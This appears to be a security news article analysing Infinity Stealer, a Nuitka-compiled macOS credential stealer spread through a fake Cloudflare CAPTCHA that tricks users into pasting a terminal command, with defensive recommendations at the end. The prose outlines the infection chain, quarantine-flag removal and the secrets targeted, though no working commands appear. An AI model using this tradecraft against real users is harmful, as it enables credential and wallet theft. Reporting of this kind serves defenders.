New Infinity Stealer Malware Grabs macOS Data via ClickFix Lures

MacOS security has entered a new era of complexity as threat actors adopt advanced tooling previously seen mostly on Windows. Infinity Stealer exemplifies this shift by leveraging Nuitka, an open‑source Python‑to‑C compiler, to produce a genuine native Mach‑O binary. Unlike traditional PyInstaller bundles that expose bytecode, Nuitka’s output blends seamlessly with legitimate macOS executables, making signature‑based detection far more challenging. Coupled with a ClickFix lure that imitates Cloudflare’s human verification, the malware exploits user trust and the habit of copying terminal commands, bypassing many endpoint protections.

The attack chain is meticulously crafted. A fake CAPTCHA hosted on update‑check.com delivers a base64‑encoded curl command, which, when pasted into Terminal, decodes a Bash script that writes an 8.6 MB loader to /tmp, clears the quarantine flag, and launches it in the background. The loader unpacks a 35 MB zstd‑compressed archive containing the final Python‑based stealer. Before stealing data, the payload performs anti‑analysis checks to evade sandboxes, then extracts credentials from Chromium‑based browsers, Firefox, macOS Keychain, cryptocurrency wallets, and plaintext secrets in developer files. Exfiltration occurs over HTTP POST, while a Telegram bot notifies the operators of successful theft.

For enterprises and security teams, Infinity Stealer underscores the need for heightened vigilance on macOS endpoints. Traditional signature solutions may miss Nuitka‑compiled binaries, so behavioral analytics, strict application allow‑lists, and user education become critical. Organizations should enforce policies that block execution of unsigned binaries from temporary locations and monitor for anomalous Terminal commands. As attackers continue to refine macOS‑specific toolchains, a layered defense strategy that combines endpoint detection and response (EDR), network traffic inspection, and regular user training will be essential to mitigate this emerging threat.